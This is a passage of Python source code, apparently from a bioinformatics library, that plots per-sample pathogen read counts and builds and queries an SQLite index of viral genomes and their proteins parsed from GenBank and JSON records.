mean = np.mean(readCounts)
sd = np.std(readCounts)
color = []
for readCount, sampleName in zip(readCounts, sampleNames):
if (readCount > (sdMultiple * sd) + mean and
readCount >= minReadsForHighlighting):
color.append(highlight)
highlighted.append(sampleName)
else:
color.append(normal)
nSamples = len(sampleNames)
x = np.arange(nSamples)
yMin = np.zeros(nSamples)
ax.set_xticks([])
ax.set_xlim((-0.5, nSamples - 0.5))
ax.vlines(x, yMin, readCounts, color=color)
genomeInfo = self._db.findGenome(genomeAccession)
if highlighted:
title = '%s\nIn red: %s' % (
genomeInfo['organism'], fill(', '.join(highlighted), 50))
else:
# Add a newline to keep the first line of each title at the
# same place as those titles that have an "In red:" second
# line.
title = genomeInfo['organism'] + '\n'
ax.set_title(title, fontsize=10)
ax.tick_params(axis='both', which='major', labelsize=8)
ax.tick_params(axis='both', which='minor', labelsize=6)
def pathogenPanel(self, filename):
"""
Make a panel of images, with each image being a graph giving pathogen
de-duplicated (by id) read count (Y axis) versus sample id (X axis).
@param filename: A C{str} file name to write the image to.
"""
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
self._computeUniqueReadCounts()
genomeAccessions = sorted(self.genomeAccessions)
sampleNames = sorted(self.sampleNames)
cols = 5
rows = int(len(genomeAccessions) / cols) + (
0 if len(genomeAccessions) % cols == 0 else 1)
figure, ax = plt.subplots(rows, cols, squeeze=False)
coords = dimensionalIterator((rows, cols))
for genomeAccession in genomeAccessions:
row, col = next(coords)
self._pathogenSamplePlot(genomeAccession, sampleNames,
ax[row][col])
# Hide the final panel graphs (if any) that have no content. We do
# this because the panel is a rectangular grid and some of the
# plots at the end of the last row may be unused.
for row, col in coords:
ax[row][col].axis('off')
figure.suptitle(
'Per-sample read count for %d pathogen%s and %d sample%s.\n\n' % (
len(genomeAccessions),
'' if len(genomeAccessions) == 1 else 's',
len(sampleNames),
'' if len(sampleNames) == 1 else 's'),
fontsize=18)
figure.set_size_inches(5.0 * cols, 2.0 * rows, forward=True)
plt.subplots_adjust(hspace=0.4)
figure.savefig(filename)
class _Genome(object):
"""
Hold genome information, mirroring the attributes of a BioPython
GenBank record.
@param d: A C{dict} holding genome information (see below).
"""
def __init__(self, d):
self.id = d['id']
self.description = d['name']
self.seq = d['sequence']
self.annotations = {}
self.lineage = [LineageElement(*lineage)
for lineage in d.get('lineage', [])]
self.features = [_GenomeFeature(f) for f in d['features']]
class _GenomeLocation(object):
"""
Hold genome feature location information, mirroring the attributes of a
BioPython GenBank record.
@param start: An C{int} start location.
@param end: An C{int} stop location.
@param strand: The C{int} strand, either 1 for forward or 0 for reverse.
"""
def __init__(self, start, end, strand):
self.start = start
self.end = end
self.strand = strand
def __str__(self):
return '[%d:%d](%s)' % (self.start, self.end,
'+' if self.strand == 1 else '-')
class _GenomeFeature(object):
"""
Hold genome feature information, mirroring the attributes of a BioPython
GenBank record.
@param d: A C{dict} holding genome feature information.
"""
def __init__(self, d):
self.type = d['type']
self.qualifiers = d['qualifiers']
self.strand = 1
location = d['qualifiers']['location']
self.location = _GenomeLocation(location['start'], location['stop'],
self.strand)
class SqliteIndexWriter(object):
"""
Create or update an Sqlite3 database holding information about proteins and
the genomes they come from.
@param dbFilename: A C{str} file name containing an sqlite3 database. If
the file does not exist it will be created. The special string
":memory:" can be used to create an in-memory database.
@param fastaFp: A file-pointer to which the protein FASTA is written.
"""
PROTEIN_ACCESSION_FIELD = 2
GENOME_ACCESSION_FIELD = 4
SEQUENCE_ID_PREFIX = 'civ'
SEQUENCE_ID_SEPARATOR = '|'
def __init__(self, dbFilename, fastaFp=sys.stdout):
self._connection = sqlite3.connect(dbFilename)
self._fastaFp = fastaFp
cur = self._connection.cursor()
cur.executescript('''
CREATE TABLE IF NOT EXISTS proteins (
accession VARCHAR UNIQUE PRIMARY KEY,
genomeAccession VARCHAR NOT NULL,
sequence VARCHAR NOT NULL,
length INTEGER NOT NULL,
offsets VARCHAR NOT NULL,
forward INTEGER NOT NULL,
circular INTEGER NOT NULL,
rangeCount INTEGER NOT NULL,
gene VARCHAR,
note VARCHAR,
product VARCHAR,
FOREIGN KEY (genomeAccession)
REFERENCES genomes (accession)
);
CREATE TABLE IF NOT EXISTS genomes (
accession VARCHAR UNIQUE PRIMARY KEY,
organism VARCHAR NOT NULL,
name VARCHAR NOT NULL,
sequence VARCHAR NOT NULL,
length INTEGER NOT NULL,
proteinCount INTEGER NOT NULL,
host VARCHAR,
note VARCHAR,
taxonomyId INTEGER,
databaseName VARCHAR
);
''')
self._connection.commit()
def addGenBankFile(self, filename, taxonomyDatabase, dnaOnly=False,
rnaOnly=False, minGenomeLength=None,
maxGenomeLength=None, excludeExclusiveHosts=None,
excludeFungusOnlyViruses=False,
excludePlantOnlyViruses=False, databaseName=None,
proteinSource='GENBANK', genomeSource='GENBANK',
duplicationPolicy='error', logfp=None):
"""
Add proteins from a GenBank file.
@param filename: A C{str} file name, with the file in GenBank format
(see https://www.ncbi.nlm.nih.gov/Sitemap/samplerecord.html).
@param taxonomyDatabase: A taxonomy database. Must be given if
C{dnaOnly} is C{True} or C{rnaOnly} is C{True} or
C{excludeExclusiveHosts} is not C{None}.
@param dnaOnly: If C{True}, only include DNA viruses.
@param rnaOnly: If C{True}, only include RNA viruses.
@param minGenomeLength: If not C{None}, genomes of a length shorter
than this should not be added.
@param maxGenomeLength: If not C{None}, genomes of a length greater
than this should not be added.
@param excludeExclusiveHosts: Either C{None} or a set of host types
that should cause a genome to be excluded if the genome only
has a single host and it is in C{excludeExclusiveHosts}.
@param excludeFungusOnlyViruses: If C{True}, do not include fungus-only
viruses.
@param excludePlantOnlyViruses: If C{True}, do not include plant-only
viruses.
@param databaseName: A C{str} indicating the database the records
in C{filename} came from (e.g., 'refseq' or 'RVDB').
@param proteinSource: A C{str} giving the source of the protein
accession number. This becomes part of the sequence id printed
in the protein FASTA output.
@param genomeSource: A C{str} giving the source of the genome
accession number. This becomes part of the sequence id printed
in the protein FASTA output.
@param duplicationPolicy: A C{str} indicating what to do if a
to-be-inserted accession number is already present in the database.
"error" results in a ValueError being raised, "ignore" means ignore
the duplicate. It should also be possible to update (i.e., replace)
but that is not supported yet.
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@raise DatabaseDuplicationError: If a duplicate accession number is
encountered and C{duplicationPolicy} is 'error'.
@return: A tuple containing two C{int}s: the number of genome sequences
in the added file and the total number of proteins found.
"""
def lineageFetcher(genome):
return taxonomyDatabase.lineage(genome.id)
with open(filename) as fp:
with self._connection:
genomes = SeqIO.parse(fp, 'gb')
return self._addGenomes(
genomes, taxonomyDatabase, lineageFetcher,
dnaOnly=dnaOnly, rnaOnly=rnaOnly,
minGenomeLength=minGenomeLength,
maxGenomeLength=maxGenomeLength,
excludeExclusiveHosts=excludeExclusiveHosts,
excludeFungusOnlyViruses=excludeFungusOnlyViruses,
excludePlantOnlyViruses=excludePlantOnlyViruses,
databaseName=databaseName, proteinSource=proteinSource,
genomeSource=genomeSource,
duplicationPolicy=duplicationPolicy, logfp=logfp)
def addJSONFile(self, filename, taxonomyDatabase, dnaOnly=False,
rnaOnly=False, minGenomeLength=None, maxGenomeLength=None,
excludeExclusiveHosts=None,
excludeFungusOnlyViruses=False,
excludePlantOnlyViruses=False,
databaseName=None, proteinSource='GENBANK',
genomeSource='GENBANK', duplicationPolicy='error',
logfp=None):
"""
Add proteins from a JSON infor file.
@param filename: A C{str} file name, in JSON format.
@param taxonomyDatabase: A taxonomy database. Must be given if
C{dnaOnly} is C{True} or C{rnaOnly} is C{True} or
C{excludeExclusiveHosts} is not C{None}.
@param dnaOnly: If C{True}, only include DNA viruses.
@param rnaOnly: If C{True}, only include RNA viruses.
@param minGenomeLength: If not C{None}, genomes of a length shorter
than this should not be added.
@param maxGenomeLength: If not C{None}, genomes of a length greater
than this should not be added.
@param excludeExclusiveHosts: Either C{None} or a set of host types
that should cause a genome to be excluded if the genome only
has a single host and it is in C{excludeExclusiveHosts}.
@param excludeFungusOnlyViruses: If C{True}, do not include fungus-only
viruses.
@param excludePlantOnlyViruses: If C{True}, do not include plant-only
viruses.
@param databaseName: A C{str} indicating the database the records
in C{filename} came from (e.g., 'refseq' or 'RVDB').
@param proteinSource: A C{str} giving the source of the protein
accession number. This becomes part of the sequence id printed
in the protein FASTA output.
@param genomeSource: A C{str} giving the source of the genome
accession number. This becomes part of the sequence id printed
in the protein FASTA output.
@param duplicationPolicy: A C{str} indicating what to do if a
to-be-inserted accession number is already present in the database.
"error" results in a ValueError being raised, "ignore" means ignore
the duplicate. It should also be possible to update (i.e., replace)
but that is not supported yet.
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@raise DatabaseDuplicationError: If a duplicate accession number is
encountered and C{duplicationPolicy} is 'error'.
@return: A tuple containing two C{int}s: the number of genome sequences
in the added file and the total number of proteins found.
"""
def lineageFetcher(genome):
return genome.lineage
with open(filename) as fp:
genome = _Genome(load(fp))
with self._connection:
return self._addGenomes(
[genome], taxonomyDatabase, lineageFetcher,
dnaOnly=dnaOnly, rnaOnly=rnaOnly,
minGenomeLength=minGenomeLength,
maxGenomeLength=maxGenomeLength,
excludeExclusiveHosts=excludeExclusiveHosts,
excludeFungusOnlyViruses=excludeFungusOnlyViruses,
excludePlantOnlyViruses=excludePlantOnlyViruses,
databaseName=databaseName, proteinSource=proteinSource,
genomeSource=genomeSource,
duplicationPolicy=duplicationPolicy, logfp=logfp)
def _addGenomes(
self, genomes, taxonomyDatabase, lineageFetcher, dnaOnly=False,
rnaOnly=False, minGenomeLength=None, maxGenomeLength=None,
excludeExclusiveHosts=None, excludeFungusOnlyViruses=False,
excludePlantOnlyViruses=False, databaseName=None,
proteinSource='GENBANK', genomeSource='GENBANK',
duplicationPolicy='error', logfp=None):
"""
Add a bunch of genomes.
@param genomes: An iterable of genomes. These are either genomes
returned by BioPython's GenBank parser or instances of C{_Genome}.
@param taxonomyDatabase: A taxonomy database.
@param lineageFetcher: A function that takes a genome and returns a
C{tuple} of the taxonomic categories of the genome. Each
tuple element is a 3-tuple of (C{int}, C{str}, C{str}) giving a
taxonomy id a (scientific) name, and the rank (species, genus,
etc). I.e., as returned by L{dark.taxonomy.LineageFetcher.lineage}.
@param dnaOnly: If C{True}, only include DNA viruses.
@param rnaOnly: If C{True}, only include RNA viruses.
@param minGenomeLength: If not C{None}, genomes of a length shorter
than this should not be added.
@param maxGenomeLength: If not C{None}, genomes of a length greater
than this should not be added.
@param excludeExclusiveHosts: Either C{None} or a set of host types
that should cause a genome to be excluded if the genome only
has a single host and it is in C{excludeExclusiveHosts}.
@param excludeFungusOnlyViruses: If C{True}, do not include fungus-only
viruses.
@param excludePlantOnlyViruses: If C{True}, do not include plant-only
viruses.
@param databaseName: A C{str} indicating the database the records
in C{filename} came from (e.g., 'refseq' or 'RVDB').
@param proteinSource: A C{str} giving the source of the protein
accession number. This becomes part of the sequence id printed
in the protein FASTA output.
@param genomeSource: A C{str} giving the source of the genome
accession number. This becomes part of the sequence id printed
in the protein FASTA output.
@param duplicationPolicy: A C{str} indicating what to do if a
to-be-inserted accession number is already present in the database.
"error" results in a ValueError being raised, "ignore" means ignore
the duplicate. It should also be possible to update (i.e., replace)
but that is not supported yet.
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@raise DatabaseDuplicationError: If a duplicate accession number is
encountered and C{duplicationPolicy} is 'error'.
@return: A C{tuple} containing three C{int}s: the number of genome
sequences examined (for potential addition), the number of genomes
actually added, and the total number of proteins added.
"""
assert self.SEQUENCE_ID_SEPARATOR not in proteinSource, (
'proteinSource cannot contain %r as that is used as a separator.' %
self.SEQUENCE_ID_SEPARATOR)
assert self.SEQUENCE_ID_SEPARATOR not in genomeSource, (
'genomeSource cannot contain %r as that is used as a separator.' %
self.SEQUENCE_ID_SEPARATOR)
assert not (dnaOnly and rnaOnly), (
'dnaOnly and rnaOnly cannot both be True.')
examinedGenomeCount = addedGenomeCount = addedProteinCount = 0
for genome in genomes:
examinedGenomeCount += 1
source = self._sourceInfo(genome, logfp=logfp)
if source is None:
# The lack of a source is logged by self._sourceInfo.
continue
genomeLength = len(str(genome.seq))
if logfp:
print('\n%s: %s' % (genome.id, genome.description), file=logfp)
print(' length = %d' % genomeLength, file=logfp)
print(' Source:', file=logfp)
for k, v in source.items():
print(' %s = %r' % (k, v), file=logfp)
print(' Annotations:', file=logfp)
for k, v in genome.annotations.items():
if k not in ('references', 'comment',
'structured_comment'):
print(' %s = %r' % (k, v), file=logfp)
if minGenomeLength is not None and genomeLength < minGenomeLength:
if logfp:
print(' Genome too short. Skipping.', file=logfp)
continue
if maxGenomeLength is not None and genomeLength > maxGenomeLength:
if logfp:
print(' Genome too long. Skipping.', file=logfp)
continue
try:
lineage = lineageFetcher(genome)
except ValueError as e:
print('ValueError calling lineage fetcher for %s (%s): %s' %
(genome.id, genome.description, e), file=logfp)
lineage = taxonomyId = None
else:
taxonomyId = lineage[0][0]
if dnaOnly:
if not source['mol_type'].endswith('DNA'):
if logfp:
print(' %s (%s) is not a DNA virus (mol_type).' %
(genome.id, genome.description), file=logfp)
continue
# if lineage:
# print(' Lineage:', file=logfp)
# print(formatLineage(lineage, prefix=' '), file=logfp)
# if isDNAVirus(lineage):
# if logfp:
# print(' %s (%s) is a DNA virus.' %
# (genome.id, genome.description),
# file=logfp)
# else:
# if logfp:
# print(' %s (%s) is not a DNA virus.' %
# (genome.id, genome.description),
# file=logfp)
# continue
# else:
# print('Could not look up taxonomy lineage for %s (%s). '
# 'Cannot confirm as DNA.' %
# (genome.id, genome.description), file=logfp)
# continue
if rnaOnly:
if not source['mol_type'].endswith('RNA'):
if logfp:
print(' %s (%s) is not a RNA virus (mol_type).' %
(genome.id, genome.description), file=logfp)
continue
# if lineage:
# print(' Lineage:', file=logfp)
# print(formatLineage(lineage, prefix=' '), file=logfp)
# if isRNAVirus(lineage):
# if logfp:
# print(' %s (%s) is an RNA virus.' %
# (genome.id, genome.description),
# file=logfp)
# else:
# if logfp:
# print(' %s (%s) is not an RNA virus. Skipping.'
# % (genome.id, genome.description),
# file=logfp)
# continue
# else:
# print('Could not look up taxonomy lineage for %s (%s). '
# 'Cannot confirm as RNA. Skipping.' %
# (genome.id, genome.description), file=logfp)
# continue
if excludeFungusOnlyViruses:
if lineage is None:
print('Could not look up taxonomy lineage for %s '
'(%s). Cannot confirm as fungus-only virus. '
'Skipping.' %
(genome.id, genome.description), file=logfp)
else:
if taxonomyDatabase.isFungusOnlyVirus(
lineage, genome.description):
if logfp:
print(' %s (%s) is a fungus-only virus.' %
(genome.id, genome.description), file=logfp)
continue
else:
if logfp:
print(' %s (%s) is not a fungus-only virus.' %
(genome.id, genome.description), file=logfp)
if excludePlantOnlyViruses:
if lineage is None:
print('Could not look up taxonomy lineage for %s '
'(%s). Cannot confirm as plant-only virus. '
'Skipping.' %
(genome.id, genome.description), file=logfp)
else:
if taxonomyDatabase.isPlantOnlyVirus(
lineage, genome.description):
if logfp:
print(' %s (%s) is a plant-only virus.' %
(genome.id, genome.description), file=logfp)
continue
else:
if logfp:
print(' %s (%s) is not a plant-only virus.' %
(genome.id, genome.description), file=logfp)
if excludeExclusiveHosts:
if taxonomyId is None:
print('Could not find taxonomy id for %s (%s). '
'Cannot exclude due to exclusive host criteria.' %
(genome.id, genome.description), file=logfp)
else:
hosts = taxonomyDatabase.hosts(taxonomyId)
if hosts is None:
print('Could not find hosts for %s (%s). Cannot '
'exclude due to exclusive host criteria.' %
(genome.id, genome.description), file=logfp)
else:
if len(hosts) == 1:
host = hosts.pop()
if host in excludeExclusiveHosts:
print(
'Excluding %s (%s) due to exclusive '
'host criteria (infects only %s hosts).' %
(genome.id, genome.description, host),
file=logfp)
continue
proteinCount = len(list(self._genomeProteins(genome)))
if self.addGenome(
genome, source, taxonomyId, proteinCount, databaseName,
duplicationPolicy=duplicationPolicy, logfp=logfp):
self.addProteins(
genome, source, proteinSource=proteinSource,
genomeSource=genomeSource,
duplicationPolicy=duplicationPolicy, logfp=logfp)
addedProteinCount += proteinCount
addedGenomeCount += 1
print(' Added %s (%s) with %d protein%s to database.' %
(genome.id, genome.description, proteinCount,
'' if proteinCount == 1 else 's'), file=logfp)
return examinedGenomeCount, addedGenomeCount, addedProteinCount
def addGenome(self, genome, source, taxonomyId, proteinCount, databaseName,
duplicationPolicy='error', logfp=None):
"""
Add information about a genome to the genomes table.
@param genome: A GenBank genome record, as parsed by SeqIO.parse
@param source: A C{dict} containing genome source information, as
returned by C{self._sourceInfo}.
@param taxonomyId: Either an C{int} taxonomy id or C{None} if the
genome taxonomy could not be looked up.
@param proteinCount: The C{int} number of proteins in the genome.
@param databaseName: A C{str} indicating the database the records
in C{filename} came from (e.g., 'refseq' or 'RVDB').
@param duplicationPolicy: A C{str} indicating what to do if a
to-be-inserted accession number is already present in the database.
"error" results in a ValueError being raised, "ignore" means ignore
the duplicate. It should also be possible to update (i.e., replace)
but that is not supported yet.
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@raise DatabaseDuplicationError: If a duplicate accession number is
encountered and C{duplicationPolicy} is 'error'.
@return: C{True} if the genome was added, else C{False}.
"""
sequence = str(genome.seq)
try:
self._connection.execute(
'INSERT INTO genomes(accession, organism, name, sequence, '
'length, proteinCount, host, note, taxonomyId, databaseName) '
'VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)',
(genome.id, source['organism'], genome.description,
sequence, len(sequence), proteinCount, source['host'],
source.get('note'), taxonomyId, databaseName))
except sqlite3.IntegrityError as e:
if str(e).find('UNIQUE constraint failed') > -1:
if duplicationPolicy == 'error':
raise DatabaseDuplicationError(
'Genome information for %r already present in '
'database: %s' % (genome.id, e))
elif duplicationPolicy == 'ignore':
if logfp:
print(
'Genome information for %r already present in '
'database. Ignoring: %s' % (genome.id, e),
file=logfp)
return False
else:
raise NotImplementedError(
'Unknown duplication policy (%s) found when '
'attempting to insert genome information for %s.' %
(duplicationPolicy, genome.id))
else:
raise
else:
return True
def addProteins(self, genome, source, proteinSource='GENBANK',
genomeSource='GENBANK', duplicationPolicy='error',
logfp=None):
"""
Add proteins from a Genbank genome record to the proteins database and
write out their sequences to the proteins FASTA file (in
C{self._fastaFp}).
@param genome: Either a GenBank genome record, as parsed by
C{SeqIO.parse} or a C{_Genome} instance (which behaves like the
former).
@param source: A C{dict} containing genome source information, as
returned by C{self._sourceInfo}.
@param proteinSource: A C{str} giving the source of the protein
accession number. This becomes part of the sequence id printed
in the protein FASTA output.
@param genomeSource: A C{str} giving the source of the genome
accession number. This becomes part of the sequence id printed
in the protein FASTA output.
@param duplicationPolicy: A C{str} indicating what to do if a
to-be-inserted accession number is already present in the database.
"error" results in a ValueError being raised, "ignore" means ignore
the duplicate. It should also be possible to update (i.e., replace)
but that is not supported yet.
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@raise DatabaseDuplicationError: If a duplicate accession number is
encountered and C{duplicationPolicy} is 'error'.
"""
genomeLen = len(genome.seq)
for fInfo in self._genomeProteins(genome, logfp=logfp):
# Write FASTA for the protein.
seqId = self.SEQUENCE_ID_SEPARATOR.join((
self.SEQUENCE_ID_PREFIX,
proteinSource, fInfo['proteinId'],
genomeSource, genome.id,
fInfo['product']))
print('>%s [%s]\n%s' %
(seqId, source['organism'], fInfo['translation']),
file=self._fastaFp)
self.addProtein(
fInfo['proteinId'], genome.id, fInfo['translation'],
fInfo['featureLocation'], fInfo['forward'],
fInfo['circular'],
fInfo['ranges'].distinctRangeCount(genomeLen),
gene=fInfo['gene'], note=fInfo['note'],
product=fInfo['product'], duplicationPolicy=duplicationPolicy,
logfp=logfp)
def addProtein(self, accession, genomeAccession, sequence, offsets,
forward, circular, rangeCount, gene=None, note=None,
product=None, duplicationPolicy='error', logfp=None):
"""
Add information about a protein to the proteins table.
@param accession: A C{str} protein accession id.
@param genomeAccession: A C{str} genome accession id (the genome to
which this protein belongs).
@param sequence: A C{str} protein amino acid sequence.
@param offsets: A C{str} describing the offsets of the protein in the
genome (as obtained from C{SeqIO.parse} on a GenBank file).
@param forward: A C{bool}, C{True} if the protein occurs on the
forward strand of the genome, C{False} if on the complement strand.
Note that this is converted to an C{int} in the database.
@param circular: A C{bool}, C{True} if the protein crosses the genome
boundary and is therefore circular, C{False} if not. Note that
this is converted to an C{int} in the database.
@param rangeCount: The C{int} number of ranges (regions) the protein
comes from in the genome.
@param gene: A C{str} gene name, or C{None} if no gene is known.
@param note: A C{str} note about the protein, or C{None}.
@param product: A C{str} description of the protein product (e.g.,
"putative replication initiation protein"), or C{None}.
@param duplicationPolicy: A C{str} indicating what to do if a
to-be-inserted accession number is already present in the database.
"error" results in a ValueError being raised, "ignore" means ignore
the duplicate. It should also be possible to update (i.e., replace)
but that is not supported yet.
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@raise DatabaseDuplicationError: If a duplicate accession number is
encountered and C{duplicationPolicy} is 'error'.
"""
try:
self._connection.execute(
'INSERT INTO proteins('
'accession, genomeAccession, sequence, length, offsets, '
'forward, circular, rangeCount, gene, note, product) '
'VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)',
(accession, genomeAccession, sequence, len(sequence), offsets,
int(forward), int(circular), rangeCount, gene, note, product))
except sqlite3.IntegrityError as e:
if str(e).find('UNIQUE constraint failed') > -1:
if duplicationPolicy == 'error':
raise DatabaseDuplicationError(
'Protein information for %r already present in '
'database.' % accession)
elif duplicationPolicy == 'ignore':
if logfp:
print(
'Protein information for %r already present in '
'database. Ignoring.' % accession, file=logfp)
else:
raise NotImplementedError(
'Unknown duplication policy (%s) found when '
'attempting to insert protein information for %s.' %
(duplicationPolicy, accession))
else:
raise
else:
if logfp:
print(' Protein %s: genome=%s product=%s' % (
accession, genomeAccession, product), file=logfp)
def _sourceInfo(self, genome, logfp):
"""
Extract summary information from a genome source feature.
@param genome: A GenBank genome record, as parsed by SeqIO.parse
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@return: A C{dict} with keys for the various pieces of information
(if any) found in the source feature (see the return value below
for detail). Or C{None} if no source feature is found or a source
feature does not have length 1.
"""
result = {}
for feature in genome.features:
if feature.type == 'source':
for key in 'host', 'note', 'organism', 'mol_type':
try:
values = feature.qualifiers[key]
except KeyError:
value = None
if key != 'note':
print('Genome %r (accession %s) source info has '
'no %r feature.' %
(genome.description, genome.id, key),
file=logfp)
else:
if len(values) == 1:
value = values[0]
if key == 'mol_type':
assert value[-3:] in ('DNA', 'RNA')
elif len(values) > 1 and key == 'host':
value = ', '.join(values)
else:
print('Genome %r (accession %s) has source '
'feature %r with length != 1: %r' % (
genome.description, genome.id, key,
values), file=logfp)
return
result[key] = value
break
else:
print('Genome %r (accession %s) had no source feature! '
'Skipping.' % (genome.description, genome.id), file=logfp)
return
return result
def _cdsInfo(self, genome, feature, logfp=None):
"""
Extract summary information from a genome CDS feature.
@param genome: A GenBank genome record, as parsed by SeqIO.parse
@param feature: A feature from a genome, as produced by BioPython's
GenBank parser.
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@return: A C{dict} with keys for the various pieces of information
found in the feature (see the return value below for detail).
Or C{None} if the feature is not of interest or otherwise invalid.
"""
qualifiers = feature.qualifiers
# Check in advance that all feature qualifiers we're interested in
# have the right lengths, if they're present.
for key in 'gene', 'note', 'product', 'protein_id', 'translation':
if key in qualifiers:
assert len(qualifiers[key]) == 1, (
'GenBank qualifier key %s is not length one %r' %
(key, qualifiers[key]))
# A protein id is mandatory.
if 'protein_id' in qualifiers:
proteinId = qualifiers['protein_id'][0]
else:
if 'translation' in qualifiers:
warn('Genome %r (accession %s) has CDS feature with no '
'protein_id feature but has a translation! '
'Skipping.\nFeature: %s' %
(genome.description, genome.id, feature))
return
# A translated (i.e., amino acid) sequence is mandatory.
if 'translation' in qualifiers:
translation = qualifiers['translation'][0]
else:
warn('Genome %r (accession %s) has CDS feature with protein '
'%r with no translated sequence. Skipping.' %
(genome.description, genome.id, proteinId))
return
featureLocation = str(feature.location)
# Make sure the feature's location string can be parsed.
try:
ranges = GenomeRanges(featureLocation)
except ValueError as e:
warn('Genome %r (accession %s) contains unparseable CDS '
'location for protein %r. Skipping. Error: %s' %
(genome.description, genome.id, proteinId, e))
return
else:
# Does the protein span the end of the genome? This indicates a
# circular genome.
circular = int(ranges.circular(len(genome.seq)))
if feature.location.start >= feature.location.end:
warn('Genome %r (accession %s) contains feature with start '
'(%d) >= stop (%d). Skipping.\nFeature: %s' %
(genome.description, genome.id, feature.location.start,
feature.location.end, feature))
return
strand = feature.strand
if strand is None:
# The strands of the protein in the genome are not all the same
# (see Bio.SeqFeature.CompoundLocation._get_strand). The
# protein is formed by the combination of reading one strand in
# one direction and the other in the other direction.
#
# This occurs just once in all 1.17M proteins found in all 700K
# RVDB (C-RVDBv15.1) genomes, for protein YP_656697.1 on the
# Ranid herpesvirus 1 strain McKinnell genome (NC_008211.1).
#
# This situation makes turning DIAMOND protein output into
# SAM very complicated because a match on such a protein
# cannot be stored as a SAM linear alignment. It instead
# requires a multi-line 'supplementary' alignment. The code
# and tests for that are more complex than I want to deal
# with at the moment, just for the sake of one protein in a
# frog herpesvirus.
warn('Genome %s (accession %s) has protein %r with mixed '
'orientation!' % (genome.description, genome.id,
proteinId))
return
elif strand == 0:
# This never occurs for proteins corresponding to genomes in
# the RVDB database C-RVDBv15.1.
warn('Genome %r (accession %s) has protein %r with feature '
'with strand of zero!' %
(genome.description, genome.id, proteinId))
return
else:
assert strand in (1, -1)
forward = strand == 1
# Make sure the strand agrees with the orientations in the
# string BioPython makes out of the locations.
assert ranges.orientations() == {forward}
return {
'circular': circular,
'featureLocation': featureLocation,
'forward': forward,
'gene': qualifiers.get('gene', [''])[0],
'note': qualifiers.get('note', [''])[0],
'product': qualifiers.get('product', ['UNKNOWN'])[0],
'proteinId': proteinId,
'ranges': ranges,
'strand': strand,
'translation': translation,
}
def _genomeProteins(self, genome, logfp=None):
"""
Get proteins (CDS features) that we can process from a genome, along
with information extracted from each.
@param genome: A GenBank genome record, as parsed by SeqIO.parse
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@return: A generator yielding feature info C{dict}s as returned by
C{self._cdsInfo}.
"""
for feature in genome.features:
if feature.type == 'CDS':
featureInfo = self._cdsInfo(genome, feature, logfp=None)
if featureInfo:
yield featureInfo
def close(self):
"""
Create indices on the accesssion ids and close the connection.
"""
cur = self._connection.cursor()
cur.execute('CREATE UNIQUE INDEX IF NOT EXISTS protein_idx ON '
'proteins(accession)')
cur.execute('CREATE UNIQUE INDEX IF NOT EXISTS genomes_idx ON '
'genomes(accession)')
self._connection.commit()
self._connection.close()
self._connection = None
def __enter__(self):
return self
def __exit__(self, excType, excValue, traceback):
self.close()
class SqliteIndex(object):
"""
Provide lookup access to an Sqlite3 database holding information about
proteins and the genomes they come from.
@param dbFilenameOrConnection: Either a C{str} file name containing an
sqlite3 database as created by C{SqliteIndexWriter} or an already
open connection to such a database. Note that an already open
connection will not be closed by self.close().
@param lookupCacheSize: The C{int} size of the memoization cache
for the protein and genome lookup functions (each has its own
memoization cache).
"""
PROTEIN_ACCESSION_FIELD = 2
GENOME_ACCESSION_FIELD = 4
def __init__(self, dbFilenameOrConnection, lookupCacheSize=1024):
if isinstance(dbFilenameOrConnection, string_types):
self._connection = sqlite3.connect(dbFilenameOrConnection)
self._closeConnection = True
else:
self._connection = dbFilenameOrConnection
self._closeConnection = False
self._connection.row_factory = sqlite3.Row
self._proteinCache = LRUCache(maxsize=lookupCacheSize)
self._genomeCache = LRUCache(maxsize=lookupCacheSize)
def genomeAccession(self, id_):
"""
Get the genome accession info from a sequence id.
@param id_: A C{str} sequence id in the form
'civ|GENBANK|%s|GENBANK|%s|%s [%s]' where the genome accession
is in the fifth '|'-separated field.
@raise IndexError: If C{id_} does not have enough |-separated fields.
@return: The C{str} accession number.
"""
return id_.split('|', self.GENOME_ACCESSION_FIELD + 1)[
self.GENOME_ACCESSION_FIELD]
def proteinAccession(self, id_):
"""
Get the protein accession info from a sequence id.
@param id_: A C{str} sequence id in the form
'civ|GENBANK|%s|GENBANK|%s|%s [%s]' where the protein accession
is in the third '|'-separated field.
@raise IndexError: If C{id_} does not have enough |-separated fields.
@return: The C{str} accession number.
"""
return id_.split('|', self.PROTEIN_ACCESSION_FIELD + 1)[
self.PROTEIN_ACCESSION_FIELD]
@cachedmethod(attrgetter('_genomeCache'))
def _findGenome(self, accession):
"""
Find info about a genome, given an accession number.
@param accession: A C{str} accession number.
@return: A C{dict} with keys corresponding to the names of the columns
in the genomes database table, else C{None} if C{id_} cannot be
found.
"""
cur = self.execute(
'SELECT * FROM genomes WHERE accession = ?', (accession,))
row = cur.fetchone()
if row:
result = dict(row)
# TODO: the following line can be removed, I think.
result['accession'] = accession
return result
def findGenome(self, id_):
"""
Find info about a genome, given a sequence id.
@param id_: A C{str} sequence id. This is either of the form
'civ|GENBANK|%s|GENBANK|%s|%s [%s]' where the genome id is in the
5th '|'-delimited field, or else is the nucleotide sequence
accession number as already extracted.
@return: A C{dict} with keys corresponding to the names of the columns
in the genomes database table, else C{None} if C{id_} cannot be
found.
"""
try:
accession = self.genomeAccession(id_)
except IndexError:
accession = id_
return self._findGenome(accession)
@cachedmethod(attrgetter('_proteinCache'))
def _findProtein(self, accession):
"""
Find info about a protein, given an accession number.
@param accession: A C{str} accession number.
@return: A C{dict} with keys corresponding to the names of the columns
in the proteins database table, else C{None} if C{id_} cannot be
found.
"""
cur = self.execute(
'SELECT * FROM proteins WHERE accession = ?', (accession,))
row = cur.fetchone()
if row:
result = dict(row)
result['forward'] = bool(result['forward'])
result['circular'] = bool(result['circular'])
result['length'] = int(result['length'])
# TODO: the following line can be removed, I think.
result['accession'] = accession
